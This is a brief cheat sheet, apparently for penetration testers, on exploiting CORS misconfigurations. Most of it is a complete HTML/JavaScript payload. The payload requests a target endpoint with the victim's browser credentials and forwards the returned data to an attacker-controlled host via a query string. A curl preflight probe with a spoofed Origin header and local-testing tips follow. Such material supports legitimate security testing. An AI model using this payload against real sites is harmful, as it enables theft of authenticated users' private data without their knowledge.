1. A normal CORS payload (if you want to test it locally make sure you started Apache sudo systemctl restart apache2, and click on shield icon in firefox to disable enhance protection):

<html>
<head>
<script>
var url = "https://domain/code";
function get_code() {
  fetch(url, {
    method: 'GET',
    mode: 'cors',
    credentials: 'include'
  })
  .then(response => response.json())
  .then(data => {
    fetch('http://ip/cors?' + encodeURIComponent(JSON.stringify(data)), {
      mode: 'no-cors'
    });
  });
}
get_code();
</script>
</head>
<body></body>
</html>

2. To test CORS payload using curl:

curl -X "OPTIONS" -i -H "Origin: http://originvalue" -k https://testdomain